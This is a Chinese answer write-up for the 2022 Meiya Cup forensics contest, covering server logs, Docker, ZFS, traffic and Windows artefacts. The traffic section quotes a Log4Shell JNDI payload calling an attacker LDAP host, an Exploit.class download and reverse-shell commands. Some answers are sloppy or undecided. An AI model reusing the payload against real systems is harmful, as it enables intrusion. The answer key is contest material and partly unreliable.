2022年美亚杯（团体赛AGC部分）

前言

搜查人员于现场捡取一部服务器、一部员工 （Carson） 所用的桌面计算机及一 部流媒体服务器。 AGC 集团 IT 部門 人员称建立服务器的同事已离职，他只是 负责以浏览器登入服务器操作，对系统并不熟悉。 他只知道服务器所用的操作 系统为 “Proxmox”，上面运作一个虚拟计算器。 虚拟计算机运作公司的电邮系 统“Xeams”。现场专家在初步分析后表示“Proxmox”服务器透过三个硬盘以软 RAID 建立而成， 现场虽未能撷取服务器逻辑存储（Logical Storage）内容，但他认为先撷取逻辑存 储内容作检验较好; 桌面计算机相信被黑客入侵，分析流量纪录相信黑客取走了 服务器部份档案。

题目

流媒体服务器分析

2.[填空题] 就AGC集团网络的流媒体服务器 (Media Server)，有多少个本地用户曾经成功登录过? (以阿拉伯数字回答) (1分)

使用lastlog命令查看各个用户登录情况
lastlog命令列出了各个用户的登录情况，如果没有登录过，则显示Never logged in，如果有登录历史，则显示出ip及登录时间。

sudo lastlog

user             pts/1    192.168.182.139  四 7月 21 10:25:36 +0800 2022
sshd                                       **Never logged in**
sammy            pts/1    192.168.182.1    五 7月 22 14:22:40 +0800 2022
mysql                                      **Never logged in**
mediauser        pts/0    192.168.182.1    二 7月 19 15:04:39 +0800 2022

本地用户登录成功的有：reboot、mediause、sammy

答案：3

3.就AGC集团网络的流媒体服务器，有多少个本地用户曾经成功用 ‘ssh’ (Secure Shell)登录过? (以阿拉伯数字回答) (2分)

通过使用

last
lastlog

对比得出只有reboot、mediause、sammy三个用户的成功登录记录

答案：3

4.[填空题]就上述的本地用户，成功通过 ‘ssh’ 登录过该流媒体服务器多少次? (以阿拉伯数字回答) (3分)

火眼取证分析工具
路径：Liunx基本信息——>分区——>登录日志——>登录成功

进行登录ip筛选排序可以得到有12次

答案：12

5.[单选题]试找找记录失败的登录尝试信息. 有以下哪一个名称曾尝试用 ‘ssh:notty’ 登录该流媒体服务器? (2分)

A. iamhacker
B. hacking
C. hack
D. hacker
E. 以上皆非

在/var/log/btmp中可以查看到登陆失败的记录（可通过lastb命令进行检查）
直接打开备份日志中可以看到有两个用户：sammy、hack

答案：C

6.[填空题]就该流媒体服务器的本地用户, 有一个用户名是 ‘S’ 开头的, 该用户的姓氏是什么? (以大写英文回答) (3分)

硬着头皮从数据库上一个个找
解析数据库，首先在配置文件中找到数据库登录用户和密码

/** Database username */
define( 'DB_USER', 'wordpress' );
/** Database password */
define( 'DB_PASSWORD', 'user' );

解析数据库

mysql -uwordpress -puser
show databases;
use wordpress;
show tables;
select * from wp_usermeta;

可以看到
nickname sammy
first_name sammy
last_name Li

答案：Li

7.[多选题]该流媒体服务器是有使用Docker容器 (Docker Container) 的，当中包含以下哪个Docker镜像 (Docker Image) ? (3分)

A. apache2
B. ubuntu
C. centos
D. nginx
E. hello-world
F. 以上皆非

可以直接通过取证软件查看
或者通过命令
docker images

答案：BCDE

8.[单选题]就上述的Docker镜像，哪一个镜像在系统上运行中? (2分)

A. apache2
B. ubuntu
C. centos
D. nginx
E. hello-world
F. 以上皆非

命令
docker ps

答案：D

9.[多选题]该流媒体服务器是使用 ‘WordPress’ 建站 (Create Website) 的，就 ‘比特币’ 标题，有以下的电子邮箱地址曾经留有评论? (2分)

A. cn.wordpress.org
B. root58462@mail.qq.com
C. hi456@163.com
D. root@163.com
E. user1@localhost.net
F. 以上皆非

一般做法：
解析数据库，首先在配置文件中找到数据库登录用户和密码

/** Database username */
define( 'DB_USER', 'wordpress' );
/** Database password */
define( 'DB_PASSWORD', 'user' );

登录数据后操作一手

mysql -uwordpress -puser
show databases;
use wordpress;
show tables;
select * from wp_comments;

答案：BC

10.[单选题]该流媒体服务器里其中一个本地用户是有使用 ‘calendar’ 日历工具的, 日历内曾经提及以下哪个网站? (3分)

A. https://weibo.com
B. http://www.baidu.com
C. https://www.douyin.com
D. https://youku.com
E. https://www.binance.com
F. 以上皆非

直接打开

答案：E

11.[单选题]该流媒体服务器里是有使用磁盘阵列 (RAID) 的, 该设备是使用哪一个 RAID 级别? (请选择最合适的答案) (1分)

A. RAID 0
B. RAIDz2
C. RAIDz3
D. RAID 10
E. RAID 5
F. 以上皆非

调查报告中显示raid级别为mirror

答案：F

12.[单选题]该基本镜像存储池 (Basic Storage Pool) 里储存了一些视频档案, 请找出一段儿童色情影片, 该档案的最后修改时间是什么月份? (2分)

A. Jun
B. Jul
C. Aug
D. Sep
E. Oct
F. 以上皆非

我使用火眼仿真系统，仿真的时候将所有镜像都选择上，排序为acbde，根据调查报告来走。
使用命令Open /media0/mediastorage
文件名为迷住了幼迷住.mp4

答案：D

13.[填空题]承上题，拥有该段儿童色情影片的用户名称是什么? (不要输入符号，以大写英文及阿拉伯数字回答) (1分)

ll并不是linux下一个基本的命令，它实际上是ls -l的一个别名。

ll -grep | 迷住了

答案：ROOT

14.[填空题]就AGC集团网络的流媒体服务器，曾经有用户搜索过有关于儿童色情影片的资料而得到搜索结果，该用户所输入的网址是什么? (不要输入符号，以大写英文及阿拉伯数字回答，如 https://web3.com，需回答 HTTPSWEB3COM)

待定

15.[填空题]该基本镜像存储池 (pool) 有一个快照 (Snapshot)，快照的名称是什么? (不要输入符号，以大写英文及阿拉伯数字回答，如 media/mediapool@abc123，需回答MEDIAMEDIAPOOLABC123) (1分)

zpool list
查看池健康状态和空间使用情况

可以使用 -t 选项指定要显示的数据集的类型

类型	说明
filesystem	文件系统和克隆
volume	卷
snapshot	快照

使用命令zfs list -t snapshot

答案：MEDIA0MEDIASTORAGEVERSION1

16. [填空题]就上述所找到的基本镜像存储池快照 (Snapshot)，它储存了多少个档案? (以阿拉伯数字回答) (1分)

使用命令zfs rollback media0/mediastorage@version1回滚镜像，查看文件数量

答案：24

流量分析

21. [单选题]分析IP地址61.238.217.108向AGC服务器10.0.66.184发送的第一个 ‘GET’ 指令，它请求的统一资源定位系统 (Uniform Resource Locator - URL) 是什么? (1分)

A. http://155.137.195.111:8080
B. http://www.w3.org/2003/05/soap-envelope
C. http://61.238.217.108:8000
D. 以上皆非

寻找到61.238.217.108向AGC服务器10.0.66.184发送的流量，右键追踪TCP流
可以得到

答案：A

22.[单选题] IP地址61.238.217.108曾经向AGC服务器10.0.66.184发送 ‘POST’ 指令，它在 ‘HTML Form’ 项目的 ‘uname’ 栏所输入的字符串是什么? (1分)

A. root
B. ${jndi:ldap://61.238.217.108:1389/a}
C. application/x-www-form-urlencoded
D. password

过滤流量，右键追踪TCP流
得到：uname=%24%7Bjndi%3Aldap%3A%2F%2F61.238.217.108%3A1389%2Fa%7D&password=password

答案：B

23. [单选题]AGC服务器10.0.66.184收到IP地址61.238.217.108的 ‘POST’ 指令后，它执行了哪些行动? (2分)

A. 使用端口46858连接IP地址61.238.217.108的LDAP服务器的指定端口
B. 于IP地址61.238.217.108下载了Exploit.class
C. 使用端口49264连接IP地址61.238.217.108发送同步要求
D. 以上皆是

根据11流，在查找下一流也就是12流是，可以确定46858向1389发送了请求
文件中导出对象选择HTTP流可以确定有下载Exploit.class
在14流中可以确定使用了49264端口接收9001端口发送的报文

答案：D

24. [填空题]在上述行动后，IP地址61.238.217.108利用哪个端口 (Port) 向AGC服务器10.0.66.184发出指令? (以阿拉伯数字回答) (1分)

查看流14

答案：9001

25. [多选题]AGC服务器10.0.66.184里有一个AGC目录 (Directory)，它的子目录 (Sub Directory) 包含以下哪一个? (2分)

A. Accounting
B. Picture
C. Staff
D. Sambashare
E. Retail

追踪到14流，可以发现登录之后进行命令执行

ls
AGC
cd AGC
ls
Accounting
Personnel
Retail
Share
Staff
cd Staf

答案：ACE

26. [多选题]入侵者迸入AGC服务器10.0.66.184后，他成功执行以下哪些指令? (2分)

A. 檢视了readme.txt内容
B. 删除了三个档案
C. 删除了一个目录 (Directory)
D. 替档案改名
E. 建立了两个txt档案

分析14流

答案：DE

27. [单选题]入侵者曾经传送一个档案到AGC服务器10.0.66.184并将它改名 (Rename)，这个档案的原来名称是什么？(1分)

A. cGhvdG9zT0Zyb2NreQ==
B. Finanical.xls
C. readme.txt
D. anonymous

追踪流就可以看到了

ls
cGhvdG9zT0Zyb2NreQ==
mv cGhvdG9zT0Zyb2NreQ== readme.pdf

答案：A

28. [单选题]承上题，该档案原档的建立日期是什么? (2分)

A. 2022-10-21 08:10:30 (UTC+0)
B. 2022-10-21 16:19:39 (UTC+0)
C. 2022-10-22 08:10:30 (UTC+0)
D. 2022-10-22 14:22:06 (UTC+0)
E. 2022-10-22 16:19:39(UTC+0)

在windows在文件导出对象中将上述文件导出，但是文件日期就自动修改了
所以我用foremost分离出pdf文件
查看文件属性

Fri 21 Oct 2022 09:19:39 AM PDT

答案：B

29. [单选题]承上题，该档案的SHA-256哈希值是什么?

A. a6eef1... ...27364c
B. 54785c… ...fe86f0
C. 961f2b… ...647d55
D. a00e6c… ...d0eaab
E. 以上皆非

将文件从流量包中导出，然后使用工具校验

答案：B

Windows计算机

31. [单选题]分析AGC-CS计算机 (Computer) 里最初的作業系統 (Windows) ，它的实際安装时间是什么? (以时区UTC+8回答) (3分)

A. 2022-09-26 14:35:17
B. 2022-09-26 21:35:17
C. 2022-09-27 05:35:17
D. 2022-10-05 03:52:15
E. 2022-10-05 11:52:15
2022-10-05 03:52:15

也可以仿真之后用systeminfo命令查看初始安装时间

答案：D

32. [单选题]AGC-CS计算机里的 ‘Acrobat DC’ 软件的安装时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59，需回答 20221229160159) (1分)

A. 2022-09-28 19:01:40
B. 2022-09-28 07:18:33
C. 2022-08-30 19:01:40
D. 2022-08-30 07:18:33

答案：A

33. [单选题]AGC-CS计算机里的用户 ‘Carson’ 链接了一个网络磁盘机 (Network Drive)，在下列哪一个档案有相关资料? (2分)

A. \Users\Carson\NTUSER.DAT
B. \Users\admin\NTUSER.DAT
C. \Windows\System32\config\SYSTEM
D. \Windows\System32\config\SOFTWARE
E. \Windows\System32\config\SECURITY

网络磁盘采用\ip的方式进行访问，查看资源管理器的记录
存在一个share(分享)，192.168.182.134ip下的，跳转源文件就可以了

答案：A

34. [单选题]承上题，用户 ‘Carson’ 连接的网络磁盘机的IP地址是什么? (1分)

A. \\192.168.182.134\
B. \\192.168.182.134\photo
C. \\192.168.182.134\share
D. \\192.168.182.134\AGC
E. \\192.168.182.134\AGC photo

根据33题就可以看到

答案：C

35. [填空题]分析计算机里的电邮数据，当中包含嫌疑人王景浩可能的居住地址，请回答他住址的楼层 (以阿拉伯数字回答) (1分)

查看邮件解析
信用卡號碼如上，送貨地址:香港灣仔港灣道28號灣景中心A座45樓C室
請問幾時送貨

答案：45

36. [填空题]承上题，王景浩使用的信用卡号码最后四位数字是? (1分)

查看邮件解析的数据
或者通过仿真在最近打开项目中可以看到银行卡
银行卡号为：5395910070166717

答案：6717

37. [填空题]AGC-CS计算机用户 ‘Carson’ 曾经收到一个电邮并通过里面的链结下载了一个可疑的 ‘Word’ 文件，那个档案的档案名是什么? (不要输入 ‘.’，以大写英文及阿拉伯数字回答。如 Cat10.jpg，需回答CAT10JPG) (1分)

对邮件进行分析查看

Carson,你們的做生意手法很有問題，沒有貨但不能退訂......真的很想去消委會投訴你們公司，
算吧，如果這沒有貨，你給我看看這KEFmuon 有沒有貨，型號、規格詳情附載於連結中，請看看
https://docs.google.com/document/d/1qK5AQleyHjWYK8UWlrKRXlIiPXT-HDu-/edit
?usp=sharing&ouid=107263767302169929109&rtpof=true&sd=trueOn Sep 27, 2022, at 

可以得到一个链接。链接可以确定他是谷歌下载的
在路径/users/carson/downloads/下可以找到个名为KEFmuon.docx

答案：KEFMUONDOCK

38. [单选题]承上题，分析该 ‘Word’ 文件，它的可能用途是? (3分)

A. 访问一个网站
B. 记录键盘操作
C. 把档案加密
D. 改变桌面壁纸
E. 关闭计算机

将文件导出来
平台分析：https://www.threatbook.cn/product/sandbox
腾讯：https://habo.qq.com/

答案：A

39. [单选题]AGC-CS计算机里有一个名为 ‘admin’ 的用户，它是在何时被建立的? (以时区UTC+8回答) (1分)

A. 2022-09-28
B. 2022-09-29
C. 2022-09-30
D. 2022-10-01
E. 以上皆非

根据账户登录信息、更改密码日期、系统安全日志记录

答案：B

40. [填空题]黑客第一次采用用户 ‘admin’ 通过远程桌面协议 (Remote Desktop Protocol - RDP) 登录了AGC-CS计算机的时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59，需回答 20221229160159) (2分)

根据/Users/admin/AppData/Roaming/TeamViewer/Connections.txt

答案：20220930171526

41. [填空题]黑客入侵AGC-CS计算机后下载了一个扫描端口 (Port Scanning) 的软件，这软件的真正名称是? (以大写英文及阿拉伯数字回答) (3分)

黑客最早在29号入侵，因此看这之后的下载记录，只有一个putty

答案：PUTTY

42. [填空题]承上题，黑客采用上述软件取得一些计算机的IP地址及媒体访问控制地址 (‘Media Access Control’ Address - MAC Address) 并存到一个名为 ‘ip.txt’ 的档案。当中 ‘192.168.182.130’ 计算机的MAC地址是什么? (不要输入 ‘：’ 或 ‘-’ ，以大写英文及阿拉伯数字回答) (3分)

这份文件被传输到王景浩的苹果电脑
在王景浩的电脑找到打开
可以定位到

答案：9061AEC09045

43. [填空题]AGC-CS计算机里的一个跳转列表 (Jumplist) 显示了用户 ‘admin’ 曾经采用记事本 (Notepad) 打开了一个文字档案，这个文字档的SHA-256哈希值是什么? (以大写英文及阿拉伯数字回答) (3分)

答案：待定

44. [单选题]黑客除了通过 ‘RDP’ 外，还采用什么软件远端控制 (Remote Control) AGC-CS计算机? (1分)

A. VNC
B. Teamviewer
C. Anydesk
D. Splashtop Business Access
E. RemotePC

答案：B